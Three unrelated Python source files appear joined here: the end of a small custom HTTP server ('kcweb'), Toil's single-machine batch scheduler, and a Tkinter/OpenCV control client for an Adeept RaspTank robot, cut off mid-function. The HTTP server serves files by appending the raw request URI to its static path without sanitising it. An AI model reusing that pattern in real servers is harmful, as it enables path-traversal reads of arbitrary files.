HTTP_HOST=HTTP_HOST[0]
else:
HTTP_HOST=''
HTTP_COOKIE=re.findall("Cookie: (.+?)\r\n", data)#cookie
if HTTP_COOKIE:
HTTP_COOKIE=HTTP_COOKIE[0]
else:
HTTP_COOKIE=''
REMOTE_ADDR=''
HTTP_USER_AGENT=re.findall("User-Agent: (.+?)\r\n", data) #Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
if HTTP_USER_AGENT:
HTTP_USER_AGENT=HTTP_USER_AGENT[0]
else:
HTTP_USER_AGENT=''
BODY_DATA=datas[len(datas)-1]
# request
reqheader={
'REQUEST_METHOD':REQUEST_METHOD,
'RAW_URI':RAW_URI,
'PATH_INFO':PATH_INFO,
'QUERY_STRING':QUERY_STRING,
'SERVER_PROTOCOL':SERVER_PROTOCOL,
'HTTP_HOST':HTTP_HOST,
'HTTP_COOKIE':HTTP_COOKIE,
'REMOTE_ADDR':REMOTE_ADDR,
'HTTP_USER_AGENT':HTTP_USER_AGENT,
'BODY_DATA':BODY_DATA
}
p=(config.app['staticpath']+RAW_URI.replace(' ',''))
status='200 OK'
if os.path.isfile(p):
kind = filetype.guess(p)
if kind is None:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[("Cache-Control","public, max-age=43200"),("Expires","Thu, 07 Nov 2019 02:59:02 GMT")]
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
else:
f=open(p,"rb")
body=f.read()
f.close()
resheader=[("Content-Type",kind.mime),("Cache-Control","public, max-age=43200"),("Accept-Ranges","bytes"),("Expires","Thu, 07 Nov 2019 02:59:02 GMT")]
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
else:
status,resheader,body=self.__routes(reqheader)
body=body.encode()
header="HTTP/1.1 %s \n" % status
header+="Content-Length:%d\n" % len(body)
print(HTTP_HOST+' -- ['+str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))+'] "'+REQUEST_METHOD+" "+RAW_URI +" "+SERVER_PROTOCOL + '" '+status+"-")
t=time.time()
header+="Server:kcweb\n"
header+="Date:%s\n" % datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
for t in resheader:
header+="%s:%s\n" % (t[0],t[1])
header+="\n"
try:
cli_soc.send(header.encode())
cli_soc.send(body)
except Exception as e:
cli_soc.close()
else:
cli_soc.close()
tcp_socket_list.remove(cli_soc)
tcp_socket.close()
|
singleMachine.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from contextlib import contextmanager
import logging
import multiprocessing
import os
import time
import math
from threading import Thread
from threading import Lock, Condition
from six.moves.queue import Empty, Queue
import toil
from toil import subprocess
from toil.batchSystems.abstractBatchSystem import BatchSystemSupport
from toil import worker as toil_worker
from toil.common import Toil
log = logging.getLogger(__name__)
class SingleMachineBatchSystem(BatchSystemSupport):
"""
The interface for running jobs on a single machine, runs all the jobs you give it as they
come in, but in parallel.
"""
@classmethod
def supportsAutoDeployment(cls):
return False
@classmethod
def supportsWorkerCleanup(cls):
return True
numCores = multiprocessing.cpu_count()
minCores = 0.1
"""
The minimal fractional CPU. Tasks with a smaller core requirement will be rounded up to this
value. One important invariant of this class is that each worker thread represents a CPU
requirement of minCores, meaning that we can never run more than numCores / minCores jobs
concurrently.
"""
physicalMemory = toil.physicalMemory()
def __init__(self, config, maxCores, maxMemory, maxDisk):
if maxCores > self.numCores:
log.warning('Limiting maxCores to CPU count of system (%i).', self.numCores)
maxCores = self.numCores
if maxMemory > self.physicalMemory:
log.warning('Limiting maxMemory to physically available memory (%i).', self.physicalMemory)
maxMemory = self.physicalMemory
self.physicalDisk = toil.physicalDisk(config)
if maxDisk > self.physicalDisk:
log.warning('Limiting maxDisk to physically available disk (%i).', self.physicalDisk)
maxDisk = self.physicalDisk
super(SingleMachineBatchSystem, self).__init__(config, maxCores, maxMemory, maxDisk)
assert self.maxCores >= self.minCores
assert self.maxMemory >= 1
# The scale allows the user to apply a factor to each task's cores requirement, thereby
# squeezing more tasks onto each core (scale < 1) or stretching tasks over more cores
# (scale > 1).
self.scale = config.scale
if config.badWorker > 0 and config.debugWorker:
# We can't throw SIGUSR1 at the worker because it is also going to
# be the leader and/or test harness.
raise RuntimeError("Cannot use badWorker and debugWorker together; "
"worker would have to kill the leader")
self.debugWorker = config.debugWorker
# Number of worker threads that will be started
self.numWorkers = int(old_div(self.maxCores, self.minCores))
# A counter to generate job IDs and a lock to guard it
self.jobIndex = 0
self.jobIndexLock = Lock()
# A dictionary mapping IDs of submitted jobs to the command line
self.jobs = {}
"""
:type: dict[str,toil.job.JobNode]
"""
# A queue of jobs waiting to be executed. Consumed by the workers.
self.inputQueue = Queue()
# A queue of finished jobs. Produced by the workers.
self.outputQueue = Queue()
# A dictionary mapping IDs of currently running jobs to their Info objects
self.runningJobs = {}
"""
:type: dict[str,Info]
"""
# The list of worker threads
self.workerThreads = []
"""
:type list[Thread]
"""
# Variables involved with non-blocking resource acquisition
self.acquisitionTimeout = 5
self.acquisitionRetryDelay = 10
self.aquisitionCondition = Condition()
# A pool representing available CPU in units of minCores
self.coreFractions = ResourcePool(self.numWorkers, 'cores', self.acquisitionTimeout)
# A lock to work around the lack of thread-safety in Python's subprocess module
self.popenLock = Lock()
# A pool representing available memory in bytes
self.memory = ResourcePool(self.maxMemory, 'memory', self.acquisitionTimeout)
# A pool representing the available space in bytes
self.disk = ResourcePool(self.maxDisk, 'disk', self.acquisitionTimeout)
if not self.debugWorker:
log.debug('Setting up the thread pool with %i workers, '
'given a minimum CPU fraction of %f '
'and a maximum CPU value of %i.', self.numWorkers, self.minCores, maxCores)
for i in range(self.numWorkers):
worker = Thread(target=self.worker, args=(self.inputQueue,))
self.workerThreads.append(worker)
worker.start()
else:
log.debug('Started in worker debug mode.')
def _runWorker(self, jobCommand, jobID, environment):
"""
Run the jobCommand using the worker and wait for it to finish.
The worker is forked unless it is a '_toil_worker' job and
debugWorker is True.
"""
startTime = time.time() # Time job is started
if self.debugWorker and "_toil_worker" in jobCommand:
# Run the worker without forking
jobName, jobStoreLocator, jobStoreID = jobCommand.split()[1:] # Parse command
jobStore = Toil.resumeJobStore(jobStoreLocator)
# TODO: The following does not yet properly populate self.runningJobs so it is not possible to kill
# running jobs in forkless mode - see the "None" value in place of popen
info = Info(time.time(), None, killIntended=False)
try:
self.runningJobs[jobID] = info
try:
toil_worker.workerScript(jobStore, jobStore.config, jobName, jobStoreID,
redirectOutputToLogFile=not self.debugWorker) # Call the worker
finally:
self.runningJobs.pop(jobID)
finally:
if not info.killIntended:
self.outputQueue.put((jobID, 0, time.time() - startTime))
else:
with self.popenLock:
popen = subprocess.Popen(jobCommand,
shell=True,
env=dict(os.environ, **environment))
info = Info(time.time(), popen, killIntended=False)
try:
self.runningJobs[jobID] = info
try:
statusCode = popen.wait()
if statusCode != 0 and not info.killIntended:
log.error("Got exit code %i (indicating failure) "
"from job %s.", statusCode, self.jobs[jobID])
finally:
self.runningJobs.pop(jobID)
finally:
if not info.killIntended:
self.outputQueue.put((jobID, statusCode, time.time() - startTime))
# Note: The input queue is passed as an argument because the corresponding attribute is reset
# to None in shutdown()
def worker(self, inputQueue):
while True:
if self.debugWorker and inputQueue.empty():
return
args = inputQueue.get()
if args is None:
break
jobCommand, jobID, jobCores, jobMemory, jobDisk, environment = args
while True:
try:
coreFractions = int(old_div(jobCores, self.minCores))
log.debug('Acquiring %i bytes of memory from a pool of %s.', jobMemory,
self.memory)
with self.memory.acquisitionOf(jobMemory):
log.debug('Acquiring %i fractional cores from a pool of %s to satisfy a '
'request of %f cores', coreFractions, self.coreFractions,
jobCores)
with self.coreFractions.acquisitionOf(coreFractions):
with self.disk.acquisitionOf(jobDisk):
self._runWorker(jobCommand, jobID, environment)
except ResourcePool.AcquisitionTimeoutException as e:
log.debug('Could not acquire enough (%s) to run job (%s). Requested: (%s), '
'Available: %s. Sleeping for 10s.', e.resource, jobID, e.requested,
e.available)
with self.aquisitionCondition:
# Make threads sleep for the given delay, or until another job finishes.
# Whichever is sooner.
self.aquisitionCondition.wait(timeout=self.acquisitionRetryDelay)
continue
else:
log.debug('Finished job. self.coreFractions ~ %s and self.memory ~ %s',
self.coreFractions.value, self.memory.value)
with self.aquisitionCondition:
# Wake up sleeping threads
self.aquisitionCondition.notifyAll()
break
def issueBatchJob(self, jobNode):
"""Adds the command and resources to a queue to be run."""
# Round cores to minCores and apply scale
cores = math.ceil(jobNode.cores * self.scale / self.minCores) * self.minCores
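# e.g. (illustrative, ignoring float rounding): jobNode.cores=0.25, scale=1,
# minCores=0.1 -> ceil(0.25 / 0.1) * 0.1 = 3 * 0.1 ≈ 0.3 cores reserved for the job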
assert cores <= self.maxCores, ('The job {} is requesting {} cores, more than the maximum of '
'{} cores this batch system was configured with. Scale is '
'set to {}.'.format(jobNode.jobName, cores, self.maxCores, self.scale))
assert cores >= self.minCores
assert jobNode.memory <= self.maxMemory, ('The job {} is requesting {} bytes of memory, more than '
'the maximum of {} this batch system was configured '
'with.'.format(jobNode.jobName, jobNode.memory, self.maxMemory))
self.checkResourceRequest(jobNode.memory, cores, jobNode.disk)
log.debug("Issuing the command: %s with memory: %i, cores: %i, disk: %i" % (
jobNode.command, jobNode.memory, cores, jobNode.disk))
with self.jobIndexLock:
jobID = self.jobIndex
self.jobIndex += 1
self.jobs[jobID] = jobNode.command
self.inputQueue.put((jobNode.command, jobID, cores, jobNode.memory,
jobNode.disk, self.environment.copy()))
if self.debugWorker: # then run immediately, blocking for return
self.worker(self.inputQueue)
return jobID
def killBatchJobs(self, jobIDs):
"""Kills jobs by ID."""
log.debug('Killing jobs: {}'.format(jobIDs))
for jobID in jobIDs:
if jobID in self.runningJobs:
info = self.runningJobs[jobID]
info.killIntended = True
if info.popen != None:
os.kill(info.popen.pid, 9)
else:
# No popen if running in forkless mode currently
assert self.debugWorker
log.critical("Can't kill job: %s in debug mode" % jobID)
while jobID in self.runningJobs:
pass
def getIssuedBatchJobIDs(self):
"""Just returns all the jobs that have been run, but not yet returned as updated."""
return list(self.jobs.keys())
def getRunningBatchJobIDs(self):
now = time.time()
return {jobID: now - info.time for jobID, info in list(self.runningJobs.items())}
def shutdown(self):
"""
Cleanly terminate worker threads. Add sentinels to inputQueue equal to maxThreads. Join
all worker threads.
"""
# Remove reference to inputQueue (raises exception if inputQueue is used after method call)
inputQueue = self.inputQueue
self.inputQueue = None
for i in range(self.numWorkers):
inputQueue.put(None)
for thread in self.workerThreads:
thread.join()
BatchSystemSupport.workerCleanup(self.workerCleanupInfo)
def getUpdatedBatchJob(self, maxWait):
"""Returns a map of the run jobs and the return value of their processes."""
try:
item = self.outputQueue.get(timeout=maxWait)
except Empty:
return None
jobID, exitValue, wallTime = item
jobCommand = self.jobs.pop(jobID)
log.debug("Ran jobID: %s with exit value: %i", jobID, exitValue)
return jobID, exitValue, wallTime
@classmethod
def setOptions(cls, setOption):
setOption("scale", default=1)
class Info(object):
# Can't use namedtuple here since killIntended needs to be mutable
def __init__(self, startTime, popen, killIntended):
self.time = startTime
self.popen = popen
self.killIntended = killIntended
class ResourcePool(object):
def __init__(self, initial_value, resourceType, timeout):
super(ResourcePool, self).__init__()
self.condition = Condition()
self.value = initial_value
self.resourceType = resourceType
self.timeout = timeout
def acquire(self, amount):
with self.condition:
startTime = time.time()
while amount > self.value:
if time.time() - startTime >= self.timeout:
# This means the thread timed out waiting for the resource. We exit the nested
# context managers in worker to prevent blocking of a resource due to
# unavailability of a nested resource request.
raise self.AcquisitionTimeoutException(resource=self.resourceType,
requested=amount, available=self.value)
# Allow 5 seconds to get the resource, else quit through the above if condition.
# This wait + timeout is the last thing in the loop such that a request that takes
# longer than 5s due to multiple wakes under the 5 second threshold are still
# honored.
self.condition.wait(timeout=self.timeout)
self.value -= amount
self.__validate()
def release(self, amount):
with self.condition:
self.value += amount
self.__validate()
self.condition.notifyAll()
def __validate(self):
assert 0 <= self.value
def __str__(self):
return str(self.value)
def __repr__(self):
return "ResourcePool(%i)" % self.value
@contextmanager
def acquisitionOf(self, amount):
self.acquire(amount)
try:
yield
finally:
self.release(amount)
class AcquisitionTimeoutException(Exception):
"""To be raised when a resource request times out."""
def __init__(self, resource, requested, available):
"""
Creates an instance of this exception that indicates which resource is insufficient for
current demands, as well as the amount requested and amount actually available.
:param str resource: string representing the resource type
:param int|float requested: the amount of the particular resource requested that resulted
in this exception
:param int|float available: amount of the particular resource actually available
"""
self.requested = requested
self.available = available
self.resource = resource
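# Usage sketch (illustrative): the worker threads above combine these pools as
# nested context managers, e.g.
#     pool = ResourcePool(100, 'memory', timeout=5)
#     with pool.acquisitionOf(40):
#         ...   # 60 units remain available to other threads
# and a request that cannot be satisfied within `timeout` seconds raises
# ResourcePool.AcquisitionTimeoutException, which the worker catches and retries.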
|
GUI.py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# File name : client.py
# Description : client
# Website : www.adeept.com
# E-mail : support@adeept.com
# Author : William
# Date : 2018/08/22
#
import cv2
import zmq
import base64
import numpy as np
from socket import *
import sys
import time
import threading as thread
import tkinter as tk
ip_stu=1 #Shows connection status
c_f_stu = 0
c_b_stu = 0
c_l_stu = 0
c_r_stu = 0
c_ls_stu= 0
c_rs_stu= 0
funcMode= 0
tcpClicSock = ''
root = ''
stat = 0
ultra_data = 'Ultrasonic OFF'
########>>>>>VIDEO<<<<<########
def video_thread():
global footage_socket, font, frame_num, fps
context = zmq.Context()
footage_socket = context.socket(zmq.SUB)
footage_socket.bind('tcp://*:5555')
footage_socket.setsockopt_string(zmq.SUBSCRIBE, np.unicode(''))
font = cv2.FONT_HERSHEY_SIMPLEX
frame_num = 0
fps = 0
def get_FPS():
global frame_num, fps
while 1:
try:
time.sleep(1)
fps = frame_num
frame_num = 0
except:
time.sleep(1)
def opencv_r():
global frame_num
while True:
try:
frame = footage_socket.recv_string()
img = base64.b64decode(frame)
npimg = np.frombuffer(img, dtype=np.uint8)
source = cv2.imdecode(npimg, 1)
cv2.putText(source,('PC FPS: %s'%fps),(40,20), font, 0.5,(255,255,255),1,cv2.LINE_AA)
try:
cv2.putText(source,('CPU Temperature: %s'%CPU_TEP),(370,350), font, 0.5,(128,255,128),1,cv2.LINE_AA)
cv2.putText(source,('CPU Usage: %s'%CPU_USE),(370,380), font, 0.5,(128,255,128),1,cv2.LINE_AA)
cv2.putText(source,('RAM Usage: %s'%RAM_USE),(370,410), font, 0.5,(128,255,128),1,cv2.LINE_AA)
if ultrasonicMode == 1:
cv2.line(source,(320,240),(260,300),(255,255,255),1)
cv2.line(source,(210,300),(260,300),(255,255,255),1)
cv2.putText(source,('%sm'%ultra_data),(210,290), font, 0.5,(255,255,255),1,cv2.LINE_AA)
except:
pass
#cv2.putText(source,('%sm'%ultra_data),(210,290), font, 0.5,(255,255,255),1,cv2.LINE_AA)
cv2.imshow("Stream", source)
frame_num += 1
cv2.waitKey(1)
except:
time.sleep(0.5)
break
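# Illustrative note (assumption about the robot-side sender, which is not shown
# here): the Raspberry Pi presumably publishes base64-encoded JPEG frames on the
# matching zmq PUB socket, roughly:
#     # sender = zmq.Context().socket(zmq.PUB); sender.connect('tcp://<pc-ip>:5555')
#     # ok, buf = cv2.imencode('.jpg', frame)
#     # sender.send(base64.b64encode(buf))
# which is what recv_string()/b64decode/imdecode above undo on the PC side.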
fps_threading=thread.Thread(target=get_FPS) #Define a thread for the FPS counter
fps_threading.setDaemon(True) #Daemon thread: it exits automatically when the mainloop() closes
fps_threading.start() #Thread starts
video_threading=thread.Thread(target=video_thread) #Define a thread for FPV video setup
video_threading.setDaemon(True) #Daemon thread: it exits automatically when the mainloop() closes
video_threading.start() #Thread starts
########>>>>>VIDEO<<<<<########
def replace_num(initial,new_num): #Call this function to replace data in '.txt' file
newline=""
str_num=str(new_num)
with open("ip.txt","r") as f:
for line in f.readlines():
if(line.find(initial) == 0):
line = initial+"%s" %(str_num)
newline += line
with open("ip.txt","w") as f:
f.writelines(newline) #Call this function to replace data in '.txt' file
def num_import(initial): #Call this function to import data from '.txt' file
with open("ip.txt") as f:
for line in f.readlines():
if(line.find(initial) == 0):
r=line
begin=len(list(initial))
snum=r[begin:]
n=snum
return n
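# Illustrative note (assumption): replace_num()/num_import() expect an ip.txt
# file in the working directory whose lines start with a key prefix, e.g.
#     IP:192.168.1.123
# so num_import('IP:') returns the text after 'IP:' on that line, and
# replace_num('IP:', '192.168.1.50') rewrites it.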
def call_forward(event): #When this function is called,client commands the car to move forward
global c_f_stu
if c_f_stu == 0:
tcpClicSock.send(('forward').encode())
c_f_stu=1
def call_back(event): #When this function is called,client commands the car to move backward
global c_b_stu
if c_b_stu == 0:
tcpClicSock.send(('backward').encode())
c_b_stu=1
def call_FB_stop(event): #When this function is called,client commands the car to stop moving
global c_f_stu,c_b_stu,c_l_stu,c_r_stu,c_ls_stu,c_rs_stu
c_f_stu=0
c_b_stu=0
tcpClicSock.send(('DS').encode())
def call_Turn_stop(event): #When this function is called,client commands the car to stop moving
global c_f_stu,c_b_stu,c_l_stu,c_r_stu,c_ls_stu,c_rs_stu
c_l_stu=0
c_r_stu=0
c_ls_stu=0
c_rs_stu=0
tcpClicSock.send(('TS').encode())
def call_Left(event): #When this function is called,client commands the car to turn left
global c_l_stu
if c_l_stu == 0:
tcpClicSock.send(('left').encode())
c_l_stu=1
def call_Right(event): #When this function is called,client commands the car to turn right
global c_r_stu
if c_r_stu == 0:
tcpClicSock.send(('right').encode())
c_r_stu=1
def call_LeftSide(event):
tcpClicSock.send(('out').encode())
def call_RightSide(event):
tcpClicSock.send(('in').encode())
def call_CLeft(event):
tcpClicSock.send(('c_left').encode())
def call_CRight(event):
tcpClicSock.send(('c_right').encode())
def call_headup(event):
tcpClicSock.send(('headup').encode())
def call_headdown(event):
tcpClicSock.send(('headdown').encode())
def call_headleft(event):
tcpClicSock.send(('catch').encode())
def call_headright(event):
tcpClicSock.send(('loose').encode())
def call_headhome(event):
tcpClicSock.send(('headhome').encode())
def call_steady(event):
global ultrasonicMode
if funcMode == 0:
tcpClicSock.send(('steady').encode())
ultrasonicMode = 1
else:
tcpClicSock.send(('funEnd').encode())
def call_FindColor(event):
if funcMode == 0:
tcpClicSock.send(('FindColor').encode())
else:
tcpClicSock.send(('funEnd').encode())
def call_WatchDog(event):
if funcMode == 0:
tcpClicSock.send(('WatchDog').encode())
else:
tcpClicSock.send(('funEnd').encode())
def call_FindLine(event):
if funcMode == 0:
tcpClicSock.send(('FindLine').encode())
else:
tcpClicSock.send(('funEnd').encode())
def all_btn_red():
Btn_Steady.config(bg='#FF6D00', fg='#000000')
Btn_FindColor.config(bg='#FF6D00', fg='#000000')
Btn_WatchDog.config(bg='#FF6D00', fg='#000000')
Btn_Fun4.config(bg='#FF6D00', fg='#000000')
Btn_Fun5.config(bg='#FF6D00', fg='#000000')
Btn_Fun6.config(bg='#FF6D00', fg='#000000')
def all_btn_normal():
Btn_Steady.config(bg=color_btn, fg=color_text)
Btn_FindColor.config(bg=color_btn, fg=color_text)
Btn_WatchDog.config(bg=color_btn, fg=color_text)
Btn_Fun4.config(bg=color_btn, fg=color_text)
Btn_Fun5.config(bg=color_btn, fg=color_text)
Btn_Fun6.config(bg=color_btn, fg=color_text)
def connection_thread():
global funcMode, ultrasonicMode, canvas_rec, canvas_text
while 1:
car_info = (tcpClicSock.recv(BUFSIZ)).decode()
if not car_info:
continue
elif 'FindColor' in car_info:
funcMode = 1
all_btn_red()
Btn_FindColor.config(bg='#00E676')
elif 'steady' in car_info:
funcMode = 1
all_btn_red()
Btn_Steady.config(bg='#00E676')
elif 'WatchDog' in car_info:
funcMode = 1
all_btn_red()
Btn_WatchDog.config(bg='#00E676')
elif 'FindLine' in car_info:
funcMode = 1
all_btn_red()
Btn_Fun4.config(bg='#00E676')
elif 'FunEnd' in car_info:
funcMode = 0
all_btn_normal()
ultrasonicMode = 0
canvas_rec=canvas_ultra.create_rectangle(0,0,352,30,fill = color_btn,width=0)
canvas_text=canvas_ultra.create_text((90,11),text='Ultrasonic OFF',fill=color_text)
def instruction():
instructions = []
while 1:
instruction_1 = 'You can use shortcuts to control the robot'
instructions.append(instruction_1)
instruction_2 = 'W: Forward S: Backward A: Turn left D: Turn right'
instructions.append(instruction_2)
instruction_3 = 'I: Look up K: Look down J: Grab L: Loose'
instructions.append(instruction_3)
instruction_4 = 'Q: Hand reaches out E: Hand takes back U & O: Hand rotation'
instructions.append(instruction_4)
instruction_5 = 'F (the Home button on GUI): Arm and head return to original position'
instructions.append(instruction_5)
instruction_6 = 'then the PWM of servos will be set to 0'
instructions.append(instruction_6)
instruction_7 = 'for better battery and servo maintenance'
instructions.append(instruction_7)
for ins_show in instructions:
label_ins.config(text=ins_show)
time.sleep(4)
def Info_receive():
global CPU_TEP,CPU_USE,RAM_USE
HOST = ''
INFO_PORT = 2256 #Define port serial
ADDR = (HOST, INFO_PORT)
InfoSock = socket(AF_INET, SOCK_STREAM)
InfoSock.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
InfoSock.bind(ADDR)
InfoSock.listen(5) #Start server,waiting for client
InfoSock, addr = InfoSock.accept()
print('Info connected')
while 1:
try:
info_data = ''
info_data = str(InfoSock.recv(BUFSIZ).decode())
info_get = info_data.split()
CPU_TEP,CPU_USE,RAM_USE= info_get
#print('cpu_tem:%s\ncpu_use:%s\nram_use:%s'%(CPU_TEP,CPU_USE,RAM_USE))
CPU_TEP_lab.config(text='CPU Temp: %s℃'%CPU_TEP)
CPU_USE_lab.config(text='CPU Usage: %s'%CPU_USE)
RAM_lab.config(text='RAM Usage: %s'%RAM_USE)
except:
pass
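# Illustrative example (assumption): the robot sends the three stats as one
# whitespace-separated string, e.g. "52.1 23% 41%", which the split() above
# unpacks into CPU_TEP, CPU_USE and RAM_USE for the three status labels.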
def ultra_receive():
global ultra_data, canvas_text, canvas_rec
ultra_HOST = ''
ultra_PORT = 2257 #Define port serial
ultra_ADDR = (ultra_HOST, ultra_PORT)
ultra_Sock = socket(AF_INET, SOCK_STREAM)
ultra_Sock.setsockopt(SOL_SOCKET,SO_REUSEADDR,1)
ultra_Sock.bind(ultra_ADDR)
ultra_Sock.listen(5) #Start server,waiting for client
ultra_Sock, addr = ultra_Sock.accept()
canvas_text=canvas_ultra.create_text((90,11),text='Ultrasonic OFF',fill=color_text)
while 1:
try:
ultra_data = str(ultra_Sock.recv(BUFSIZ).decode())
try:
ultra_data = float(ultra_data)
if float(ultra_data) < 3:
#print(ultra_data)
try:
canvas_ultra.delete(canvas_text)
canvas_ultra.delete(canvas_rec)
except:
pass
#canvas_rec=canvas_ultra.create_rectangle(0,0,int(float(ultra_data)/145*3),30,fill = '#FFFFFF')
canvas_rec=canvas_ultra.create_rectangle(0,0,(352-int(float(ultra_data)*352/3)),30,fill = '#448AFF',width=0)
canvas_text=canvas_ultra.create_text((90,11),text='Ultrasonic Output: %sm'%ultra_data,fill=color_text)
#print('xxx')
except:
pass
except:
pass
def socket_connect(): #Call this function to connect with the server
global ADDR,tcpClicSock,BUFSIZ,ip_stu,ipaddr
ip_adr=E1.get() #Get the IP address from Entry
if ip_adr == '': #If no input IP address in Entry,import a default IP
ip_adr=num_import('IP:')
l_ip_4.config(text='Connecting')
l_ip_4.config(bg='#FF8F00')
l_ip_5.config(text='Default:%s'%ip_adr)
pass
SERVER_IP = ip_adr
SERVER_PORT = 10223 #Define port serial
BUFSIZ = 1024 #Define buffer size
ADDR = (SERVER_IP, SERVER_PORT)
tcpClicSock = socket(AF_INET, SOCK_STREAM) #Set connection value for socket
for i in range (1,6): #Try 5 times if disconnected
if ip_stu == 1:
print("Connecting to server @ %s:%d..." %(SERVER_IP, SERVER_PORT))
print("Connecting")
tcpClicSock.connect(ADDR) #Connection with the server
print("Connected")
l_ip_5.config(text='IP:%s'%ip_adr)
l_ip_4.config(text='Connected')
l_ip_4.config(bg='#558B2F')
replace_num('IP:',ip_adr)
E1.config(state='disabled') #Disable the Entry
Btn14.config(state='disabled') #Disable the Entry
ip_stu=0 #'0' means connected
connection_threading=thread.Thread(target=connection_thread) #Define a thread for FPV and OpenCV
connection_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
connection_threading.start() #Thread starts
info_threading=thread.Thread(target=Info_receive) #Define a thread for FPV and OpenCV
info_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
info_threading.start() #Thread starts
ultra_threading=thread.Thread(target=ultra_receive) #Define a thread for FPV and OpenCV
ultra_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
ultra_threading.start() #Thread starts
video_threading=thread.Thread(target=opencv_r) #Define a thread for FPV and OpenCV
video_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
video_threading.start() #Thread starts
break
else:
print("Cannot connecting to server,try it latter!")
l_ip_4.config(text='Try %d/5 time(s)'%i)
l_ip_4.config(bg='#EF6C00')
print('Try %d/5 time(s)'%i)
ip_stu=1
time.sleep(1)
continue
if ip_stu == 1:
l_ip_4.config(text='Disconnected')
l_ip_4.config(bg='#F44336')
def connect(event): #Call this function to connect with the server
if ip_stu == 1:
sc=thread.Thread(target=socket_connect) #Define a thread for connection
sc.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
sc.start() #Thread starts
def connect_click(): #Call this function to connect with the server
if ip_stu == 1:
sc=thread.Thread(target=socket_connect) #Define a thread for connection
sc.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
sc.start() #Thread starts
def set_R(event):
time.sleep(0.03)
tcpClicSock.send(('wsR %s'%var_R.get()).encode())
def set_G(event):
time.sleep(0.03)
tcpClicSock.send(('wsG %s'%var_G.get()).encode())
def set_B(event):
time.sleep(0.03)
tcpClicSock.send(('wsB %s'%var_B.get()).encode())
def loop(): #GUI
global tcpClicSock,root,E1,connect,l_ip_4,l_ip_5,color_btn,color_text,Btn14,CPU_TEP_lab,CPU_USE_lab,RAM_lab,canvas_ultra,color_text,var_R,var_B,var_G,Btn_Steady,Btn_FindColor,Btn_WatchDog,Btn_Fun4,Btn_Fun5,Btn_Fun6,label_ins #The value of tcpClicSock changes in the function loop(),would also changes in global so the other functions could use it.
while True:
color_bg='#000000' #Set background color
color_text='#E1F5FE' #Set text color
color_btn='#0277BD' #Set button color
color_line='#01579B' #Set line color
color_can='#212121' #Set canvas color
color_oval='#2196F3' #Set oval color
target_color='#FF6D00'
root = tk.Tk() #Define a window named root
root.title('Adeept RaspTank') #Main window title
root.geometry('565x510') #Main window size, middle of the English letter x.
root.config(bg=color_bg) #Set the background color of root window
try:
logo =tk.PhotoImage(file = 'logo.png') #Define the picture of logo,but only supports '.png' and '.gif'
l_logo=tk.Label(root,image = logo,bg=color_bg) #Set a label to show the logo picture
l_logo.place(x=30,y=13) #Place the Label in a right position
except:
pass
CPU_TEP_lab=tk.Label(root,width=18,text='CPU Temp:',fg=color_text,bg='#212121')
CPU_TEP_lab.place(x=400,y=15) #Define a Label and put it in position
CPU_USE_lab=tk.Label(root,width=18,text='CPU Usage:',fg=color_text,bg='#212121')
CPU_USE_lab.place(x=400,y=45) #Define a Label and put it in position
RAM_lab=tk.Label(root,width=18,text='RAM Usage:',fg=color_text,bg='#212121')
RAM_lab.place(x=400,y=75) #Define a Label and put it in position
l_ip=tk.Label(root,width=18,text='Status',fg=color_text,bg=color_btn)
l_ip.place(x=30,y=110) #Define a Label and put it in position
l_ip_4=tk.Label(root,width=18,text='Disconnected',fg=color_text,bg='#F44336')
l_ip_4.place(x=400,y=110) #Define a Label and put it in position
l_ip_5=tk.Label(root,width=18,text='Use default IP',fg=color_text,bg=color_btn)
l_ip_5.place(x=400,y=145) #Define a Label and put it in position
label_ins=tk.Label(root,width=71,text='Instruction',fg=color_text,bg=color_btn)
label_ins.place(x=30,y=300) #Define a Label and put it in position
E1 = tk.Entry(root,show=None,width=16,bg="#37474F",fg='#eceff1')
E1.place(x=180,y=40) #Define a Entry and put it in position
l_ip_3=tk.Label(root,width=10,text='IP Address:',fg=color_text,bg='#000000')
l_ip_3.place(x=175,y=15) #Define a Label and put it in position
label_openCV=tk.Label(root,width=28,text='OpenCV Status',fg=color_text,bg=color_btn)
label_openCV.place(x=180,y=110) #Define a Label and put it in position
canvas_ultra=tk.Canvas(root,bg=color_btn,height=23,width=352,highlightthickness=0)
canvas_ultra.place(x=30,y=145)
################################
#canvas_rec=canvas_ultra.create_rectangle(0,0,340,30,fill = '#FFFFFF',width=0)
#canvas_text=canvas_ultra.create_text((90,11),text='Ultrasonic Output: 0.75m',fill=color_text)
################################
Btn0 = tk.Button(root, width=8, text='Forward',fg=color_text,bg=color_btn,relief='ridge')
Btn1 = tk.Button(root, width=8, text='Backward',fg=color_text,bg=color_btn,relief='ridge')
Btn2 = tk.Button(root, width=8, text='Left',fg=color_text,bg=color_btn,relief='ridge')
Btn3 = tk.Button(root, width=8, text='Right',fg=color_text,bg=color_btn,relief='ridge')
Btn_LeftSide = tk.Button(root, width=8, text='<--',fg=color_text,bg=color_btn,relief='ridge')
Btn_LeftSide.place(x=30,y=195)
Btn_LeftSide.bind('<ButtonPress-1>', call_LeftSide)
